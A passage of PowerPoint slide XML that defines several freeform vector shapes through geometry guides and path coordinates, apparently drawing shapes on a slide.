                    <a:lnTo>
                      <a:pt x="48" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="142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58" name="Freeform 65"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7196138" y="4975225"/>
                <a:ext cx="249237" cy="217488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 567 w 694"/>
                  <a:gd name="T1" fmla="*/ 367 h 604"/>
                  <a:gd name="T2" fmla="*/ 567 w 694"/>
                  <a:gd name="T3" fmla="*/ 367 h 604"/>
                  <a:gd name="T4" fmla="*/ 588 w 694"/>
                  <a:gd name="T5" fmla="*/ 409 h 604"/>
                  <a:gd name="T6" fmla="*/ 588 w 694"/>
                  <a:gd name="T7" fmla="*/ 424 h 604"/>
                  <a:gd name="T8" fmla="*/ 588 w 694"/>
                  <a:gd name="T9" fmla="*/ 446 h 604"/>
                  <a:gd name="T10" fmla="*/ 588 w 694"/>
                  <a:gd name="T11" fmla="*/ 446 h 604"/>
                  <a:gd name="T12" fmla="*/ 583 w 694"/>
                  <a:gd name="T13" fmla="*/ 488 h 604"/>
                  <a:gd name="T14" fmla="*/ 562 w 694"/>
                  <a:gd name="T15" fmla="*/ 530 h 604"/>
                  <a:gd name="T16" fmla="*/ 562 w 694"/>
                  <a:gd name="T17" fmla="*/ 530 h 604"/>
                  <a:gd name="T18" fmla="*/ 547 w 694"/>
                  <a:gd name="T19" fmla="*/ 556 h 604"/>
                  <a:gd name="T20" fmla="*/ 525 w 694"/>
                  <a:gd name="T21" fmla="*/ 577 h 604"/>
                  <a:gd name="T22" fmla="*/ 504 w 694"/>
                  <a:gd name="T23" fmla="*/ 593 h 604"/>
                  <a:gd name="T24" fmla="*/ 478 w 694"/>
                  <a:gd name="T25" fmla="*/ 603 h 604"/>
                  <a:gd name="T26" fmla="*/ 478 w 694"/>
                  <a:gd name="T27" fmla="*/ 603 h 604"/>
                  <a:gd name="T28" fmla="*/ 452 w 694"/>
                  <a:gd name="T29" fmla="*/ 603 h 604"/>
                  <a:gd name="T30" fmla="*/ 426 w 694"/>
                  <a:gd name="T31" fmla="*/ 603 h 604"/>
                  <a:gd name="T32" fmla="*/ 394 w 694"/>
                  <a:gd name="T33" fmla="*/ 593 h 604"/>
                  <a:gd name="T34" fmla="*/ 357 w 694"/>
                  <a:gd name="T35" fmla="*/ 571 h 604"/>
                  <a:gd name="T36" fmla="*/ 0 w 694"/>
                  <a:gd name="T37" fmla="*/ 367 h 604"/>
                  <a:gd name="T38" fmla="*/ 69 w 694"/>
                  <a:gd name="T39" fmla="*/ 241 h 604"/>
                  <a:gd name="T40" fmla="*/ 404 w 694"/>
                  <a:gd name="T41" fmla="*/ 435 h 604"/>
                  <a:gd name="T42" fmla="*/ 404 w 694"/>
                  <a:gd name="T43" fmla="*/ 435 h 604"/>
                  <a:gd name="T44" fmla="*/ 436 w 694"/>
                  <a:gd name="T45" fmla="*/ 451 h 604"/>
                  <a:gd name="T46" fmla="*/ 462 w 694"/>
                  <a:gd name="T47" fmla="*/ 451 h 604"/>
                  <a:gd name="T48" fmla="*/ 462 w 694"/>
                  <a:gd name="T49" fmla="*/ 451 h 604"/>
                  <a:gd name="T50" fmla="*/ 483 w 694"/>
                  <a:gd name="T51" fmla="*/ 441 h 604"/>
                  <a:gd name="T52" fmla="*/ 504 w 694"/>
                  <a:gd name="T53" fmla="*/ 420 h 604"/>
                  <a:gd name="T54" fmla="*/ 504 w 694"/>
                  <a:gd name="T55" fmla="*/ 420 h 604"/>
                  <a:gd name="T56" fmla="*/ 510 w 694"/>
                  <a:gd name="T57" fmla="*/ 404 h 604"/>
                  <a:gd name="T58" fmla="*/ 515 w 694"/>
                  <a:gd name="T59" fmla="*/ 388 h 604"/>
                  <a:gd name="T60" fmla="*/ 515 w 694"/>
                  <a:gd name="T61" fmla="*/ 372 h 604"/>
                  <a:gd name="T62" fmla="*/ 510 w 694"/>
                  <a:gd name="T63" fmla="*/ 362 h 604"/>
                  <a:gd name="T64" fmla="*/ 504 w 694"/>
                  <a:gd name="T65" fmla="*/ 346 h 604"/>
                  <a:gd name="T66" fmla="*/ 494 w 694"/>
                  <a:gd name="T67" fmla="*/ 330 h 604"/>
                  <a:gd name="T68" fmla="*/ 462 w 694"/>
                  <a:gd name="T69" fmla="*/ 309 h 604"/>
                  <a:gd name="T70" fmla="*/ 136 w 694"/>
                  <a:gd name="T71" fmla="*/ 120 h 604"/>
                  <a:gd name="T72" fmla="*/ 210 w 694"/>
                  <a:gd name="T73" fmla="*/ 0 h 604"/>
                  <a:gd name="T74" fmla="*/ 693 w 694"/>
                  <a:gd name="T75" fmla="*/ 277 h 604"/>
                  <a:gd name="T76" fmla="*/ 625 w 694"/>
                  <a:gd name="T77" fmla="*/ 398 h 604"/>
                  <a:gd name="T78" fmla="*/ 567 w 694"/>
                  <a:gd name="T79" fmla="*/ 362 h 604"/>
                  <a:gd name="T80" fmla="*/ 567 w 694"/>
                  <a:gd name="T81" fmla="*/ 367 h 6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94" h="604">
                    <a:moveTo>
                      <a:pt x="567" y="367"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="567" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="346"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="277"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="367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59" name="Freeform 66"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7288213" y="4848225"/>
                <a:ext cx="204787" cy="185738"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62 w 567"/>
                  <a:gd name="T1" fmla="*/ 141 h 515"/>
                  <a:gd name="T2" fmla="*/ 130 w 567"/>
                  <a:gd name="T3" fmla="*/ 178 h 515"/>
                  <a:gd name="T4" fmla="*/ 130 w 567"/>
                  <a:gd name="T5" fmla="*/ 173 h 515"/>
                  <a:gd name="T6" fmla="*/ 130 w 567"/>
                  <a:gd name="T7" fmla="*/ 173 h 515"/>
                  <a:gd name="T8" fmla="*/ 110 w 567"/>
                  <a:gd name="T9" fmla="*/ 136 h 515"/>
                  <a:gd name="T10" fmla="*/ 94 w 567"/>
                  <a:gd name="T11" fmla="*/ 99 h 515"/>
                  <a:gd name="T12" fmla="*/ 94 w 567"/>
                  <a:gd name="T13" fmla="*/ 99 h 515"/>
                  <a:gd name="T14" fmla="*/ 94 w 567"/>
                  <a:gd name="T15" fmla="*/ 78 h 515"/>
                  <a:gd name="T16" fmla="*/ 94 w 567"/>
                  <a:gd name="T17" fmla="*/ 58 h 515"/>
                  <a:gd name="T18" fmla="*/ 99 w 567"/>
                  <a:gd name="T19" fmla="*/ 41 h 515"/>
                  <a:gd name="T20" fmla="*/ 104 w 567"/>
                  <a:gd name="T21" fmla="*/ 21 h 515"/>
                  <a:gd name="T22" fmla="*/ 104 w 567"/>
                  <a:gd name="T23" fmla="*/ 21 h 515"/>
                  <a:gd name="T24" fmla="*/ 115 w 567"/>
                  <a:gd name="T25" fmla="*/ 11 h 515"/>
                  <a:gd name="T26" fmla="*/ 115 w 567"/>
                  <a:gd name="T27" fmla="*/ 11 h 515"/>
                  <a:gd name="T28" fmla="*/ 120 w 567"/>
                  <a:gd name="T29" fmla="*/ 0 h 515"/>
                  <a:gd name="T30" fmla="*/ 241 w 567"/>
                  <a:gd name="T31" fmla="*/ 58 h 515"/>
                  <a:gd name="T32" fmla="*/ 241 w 567"/>
                  <a:gd name="T33" fmla="*/ 58 h 515"/>
                  <a:gd name="T34" fmla="*/ 230 w 567"/>
                  <a:gd name="T35" fmla="*/ 78 h 515"/>
                  <a:gd name="T36" fmla="*/ 230 w 567"/>
                  <a:gd name="T37" fmla="*/ 78 h 515"/>
                  <a:gd name="T38" fmla="*/ 220 w 567"/>
                  <a:gd name="T39" fmla="*/ 99 h 515"/>
                  <a:gd name="T40" fmla="*/ 220 w 567"/>
                  <a:gd name="T41" fmla="*/ 99 h 515"/>
                  <a:gd name="T42" fmla="*/ 209 w 567"/>
                  <a:gd name="T43" fmla="*/ 131 h 515"/>
                  <a:gd name="T44" fmla="*/ 209 w 567"/>
                  <a:gd name="T45" fmla="*/ 131 h 515"/>
                  <a:gd name="T46" fmla="*/ 209 w 567"/>
                  <a:gd name="T47" fmla="*/ 152 h 515"/>
                  <a:gd name="T48" fmla="*/ 209 w 567"/>
                  <a:gd name="T49" fmla="*/ 173 h 515"/>
                  <a:gd name="T50" fmla="*/ 209 w 567"/>
                  <a:gd name="T51" fmla="*/ 173 h 515"/>
                  <a:gd name="T52" fmla="*/ 214 w 567"/>
                  <a:gd name="T53" fmla="*/ 188 h 515"/>
                  <a:gd name="T54" fmla="*/ 225 w 567"/>
                  <a:gd name="T55" fmla="*/ 210 h 515"/>
                  <a:gd name="T56" fmla="*/ 225 w 567"/>
                  <a:gd name="T57" fmla="*/ 210 h 515"/>
                  <a:gd name="T58" fmla="*/ 241 w 567"/>
                  <a:gd name="T59" fmla="*/ 225 h 515"/>
                  <a:gd name="T60" fmla="*/ 262 w 567"/>
                  <a:gd name="T61" fmla="*/ 236 h 515"/>
                  <a:gd name="T62" fmla="*/ 566 w 567"/>
                  <a:gd name="T63" fmla="*/ 388 h 515"/>
                  <a:gd name="T64" fmla="*/ 498 w 567"/>
                  <a:gd name="T65" fmla="*/ 514 h 515"/>
                  <a:gd name="T66" fmla="*/ 0 w 567"/>
                  <a:gd name="T67" fmla="*/ 268 h 515"/>
                  <a:gd name="T68" fmla="*/ 62 w 567"/>
                  <a:gd name="T69" fmla="*/ 141 h 5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67" h="515">
                    <a:moveTo>
                      <a:pt x="62" y="141"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="130" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="566" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="141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60" name="Freeform 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7278688" y="4759325"/>
                <a:ext cx="268287" cy="158750"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 746"/>
                  <a:gd name="T1" fmla="*/ 0 h 442"/>
                  <a:gd name="T2" fmla="*/ 174 w 746"/>
                  <a:gd name="T3" fmla="*/ 52 h 442"/>
                  <a:gd name="T4" fmla="*/ 110 w 746"/>
                  <a:gd name="T5" fmla="*/ 184 h 442"/>
                  <a:gd name="T6" fmla="*/ 0 w 746"/>
                  <a:gd name="T7" fmla="*/ 131 h 442"/>
                  <a:gd name="T8" fmla="*/ 57 w 746"/>
                  <a:gd name="T9" fmla="*/ 0 h 442"/>
                  <a:gd name="T10" fmla="*/ 231 w 746"/>
                  <a:gd name="T11" fmla="*/ 79 h 442"/>
                  <a:gd name="T12" fmla="*/ 745 w 746"/>
                  <a:gd name="T13" fmla="*/ 310 h 442"/>
                  <a:gd name="T14" fmla="*/ 682 w 746"/>
                  <a:gd name="T15" fmla="*/ 441 h 442"/>
                  <a:gd name="T16" fmla="*/ 174 w 746"/>
                  <a:gd name="T17" fmla="*/ 210 h 442"/>
                  <a:gd name="T18" fmla="*/ 231 w 746"/>
                  <a:gd name="T19" fmla="*/ 79 h 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46" h="442">
                    <a:moveTo>
                      <a:pt x="57" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="174" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="231" y="79"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="745" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="79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61" name="Freeform 68"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7327900" y="4668838"/>
                <a:ext cx="269875" cy="141287"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 52 w 751"/>
                  <a:gd name="T1" fmla="*/ 21 h 394"/>
                  <a:gd name="T2" fmla="*/ 199 w 751"/>
                  <a:gd name="T3" fmla="*/ 79 h 394"/>
                  <a:gd name="T4" fmla="*/ 231 w 751"/>
                  <a:gd name="T5" fmla="*/ 0 h 394"/>
                  <a:gd name="T6" fmla="*/ 325 w 751"/>
                  <a:gd name="T7" fmla="*/ 37 h 394"/>
                  <a:gd name="T8" fmla="*/ 294 w 751"/>
                  <a:gd name="T9" fmla="*/ 116 h 394"/>
                  <a:gd name="T10" fmla="*/ 572 w 751"/>
                  <a:gd name="T11" fmla="*/ 231 h 394"/>
                  <a:gd name="T12" fmla="*/ 572 w 751"/>
                  <a:gd name="T13" fmla="*/ 231 h 394"/>
                  <a:gd name="T14" fmla="*/ 598 w 751"/>
                  <a:gd name="T15" fmla="*/ 236 h 394"/>
                  <a:gd name="T16" fmla="*/ 619 w 751"/>
                  <a:gd name="T17" fmla="*/ 236 h 394"/>
                  <a:gd name="T18" fmla="*/ 619 w 751"/>
                  <a:gd name="T19" fmla="*/ 236 h 394"/>
                  <a:gd name="T20" fmla="*/ 635 w 751"/>
                  <a:gd name="T21" fmla="*/ 226 h 394"/>
                  <a:gd name="T22" fmla="*/ 651 w 751"/>
                  <a:gd name="T23" fmla="*/ 205 h 394"/>
                  <a:gd name="T24" fmla="*/ 651 w 751"/>
                  <a:gd name="T25" fmla="*/ 205 h 394"/>
                  <a:gd name="T26" fmla="*/ 656 w 751"/>
                  <a:gd name="T27" fmla="*/ 189 h 394"/>
                  <a:gd name="T28" fmla="*/ 656 w 751"/>
                  <a:gd name="T29" fmla="*/ 189 h 394"/>
                  <a:gd name="T30" fmla="*/ 661 w 751"/>
                  <a:gd name="T31" fmla="*/ 173 h 394"/>
                  <a:gd name="T32" fmla="*/ 750 w 751"/>
                  <a:gd name="T33" fmla="*/ 210 h 394"/>
                  <a:gd name="T34" fmla="*/ 750 w 751"/>
                  <a:gd name="T35" fmla="*/ 210 h 394"/>
                  <a:gd name="T36" fmla="*/ 735 w 751"/>
                  <a:gd name="T37" fmla="*/ 257 h 394"/>
                  <a:gd name="T38" fmla="*/ 735 w 751"/>
                  <a:gd name="T39" fmla="*/ 257 h 394"/>
                  <a:gd name="T40" fmla="*/ 719 w 751"/>
                  <a:gd name="T41" fmla="*/ 299 h 394"/>
                  <a:gd name="T42" fmla="*/ 719 w 751"/>
                  <a:gd name="T43" fmla="*/ 299 h 394"/>
                  <a:gd name="T44" fmla="*/ 703 w 751"/>
                  <a:gd name="T45" fmla="*/ 336 h 394"/>
                  <a:gd name="T46" fmla="*/ 687 w 751"/>
                  <a:gd name="T47" fmla="*/ 362 h 394"/>
                  <a:gd name="T48" fmla="*/ 687 w 751"/>
                  <a:gd name="T49" fmla="*/ 362 h 394"/>
                  <a:gd name="T50" fmla="*/ 671 w 751"/>
                  <a:gd name="T51" fmla="*/ 378 h 394"/>
                  <a:gd name="T52" fmla="*/ 651 w 751"/>
                  <a:gd name="T53" fmla="*/ 389 h 394"/>
                  <a:gd name="T54" fmla="*/ 651 w 751"/>
                  <a:gd name="T55" fmla="*/ 389 h 394"/>
                  <a:gd name="T56" fmla="*/ 629 w 751"/>
                  <a:gd name="T57" fmla="*/ 393 h 394"/>
                  <a:gd name="T58" fmla="*/ 603 w 751"/>
                  <a:gd name="T59" fmla="*/ 389 h 394"/>
                  <a:gd name="T60" fmla="*/ 603 w 751"/>
                  <a:gd name="T61" fmla="*/ 389 h 394"/>
                  <a:gd name="T62" fmla="*/ 572 w 751"/>
                  <a:gd name="T63" fmla="*/ 383 h 394"/>
                  <a:gd name="T64" fmla="*/ 535 w 751"/>
                  <a:gd name="T65" fmla="*/ 367 h 394"/>
                  <a:gd name="T66" fmla="*/ 236 w 751"/>
                  <a:gd name="T67" fmla="*/ 247 h 394"/>
                  <a:gd name="T68" fmla="*/ 210 w 751"/>
                  <a:gd name="T69" fmla="*/ 315 h 394"/>
                  <a:gd name="T70" fmla="*/ 120 w 751"/>
                  <a:gd name="T71" fmla="*/ 278 h 394"/>
                  <a:gd name="T72" fmla="*/ 147 w 751"/>
                  <a:gd name="T73" fmla="*/ 210 h 394"/>
                  <a:gd name="T74" fmla="*/ 0 w 751"/>
                  <a:gd name="T75" fmla="*/ 152 h 394"/>
                  <a:gd name="T76" fmla="*/ 52 w 751"/>
                  <a:gd name="T77" fmla="*/ 21 h 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751" h="394">
                    <a:moveTo>
                      <a:pt x="52" y="21"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="199" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="750" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="735" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="719" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="671" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="603" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="603" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="21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62" name="Freeform 69"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7412038" y="4513263"/>
                <a:ext cx="273050" cy="225425"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 630 w 757"/>
                  <a:gd name="T1" fmla="*/ 557 h 626"/>
                  <a:gd name="T2" fmla="*/ 630 w 757"/>
                  <a:gd name="T3" fmla="*/ 557 h 626"/>
                  <a:gd name="T4" fmla="*/ 635 w 757"/>
                  <a:gd name="T5" fmla="*/ 520 h 626"/>
                  <a:gd name="T6" fmla="*/ 635 w 757"/>
                  <a:gd name="T7" fmla="*/ 510 h 626"/>
                  <a:gd name="T8" fmla="*/ 625 w 757"/>
                  <a:gd name="T9" fmla="*/ 494 h 626"/>
                  <a:gd name="T10" fmla="*/ 625 w 757"/>
                  <a:gd name="T11" fmla="*/ 494 h 626"/>
                  <a:gd name="T12" fmla="*/ 609 w 757"/>
                  <a:gd name="T13" fmla="*/ 473 h 626"/>
                  <a:gd name="T14" fmla="*/ 582 w 757"/>
                  <a:gd name="T15" fmla="*/ 457 h 626"/>
                  <a:gd name="T16" fmla="*/ 0 w 757"/>
                  <a:gd name="T17" fmla="*/ 426 h 626"/>
                  <a:gd name="T18" fmla="*/ 47 w 757"/>
                  <a:gd name="T19" fmla="*/ 284 h 626"/>
                  <a:gd name="T20" fmla="*/ 441 w 757"/>
                  <a:gd name="T21" fmla="*/ 331 h 626"/>
                  <a:gd name="T22" fmla="*/ 441 w 757"/>
                  <a:gd name="T23" fmla="*/ 326 h 626"/>
                  <a:gd name="T24" fmla="*/ 99 w 757"/>
                  <a:gd name="T25" fmla="*/ 137 h 626"/>
                  <a:gd name="T26" fmla="*/ 147 w 757"/>
                  <a:gd name="T27" fmla="*/ 0 h 626"/>
                  <a:gd name="T28" fmla="*/ 598 w 757"/>
                  <a:gd name="T29" fmla="*/ 294 h 626"/>
                  <a:gd name="T30" fmla="*/ 598 w 757"/>
                  <a:gd name="T31" fmla="*/ 294 h 626"/>
                  <a:gd name="T32" fmla="*/ 651 w 757"/>
                  <a:gd name="T33" fmla="*/ 331 h 626"/>
                  <a:gd name="T34" fmla="*/ 693 w 757"/>
                  <a:gd name="T35" fmla="*/ 368 h 626"/>
                  <a:gd name="T36" fmla="*/ 693 w 757"/>
                  <a:gd name="T37" fmla="*/ 368 h 626"/>
                  <a:gd name="T38" fmla="*/ 724 w 757"/>
                  <a:gd name="T39" fmla="*/ 394 h 626"/>
                  <a:gd name="T40" fmla="*/ 740 w 757"/>
                  <a:gd name="T41" fmla="*/ 426 h 626"/>
                  <a:gd name="T42" fmla="*/ 740 w 757"/>
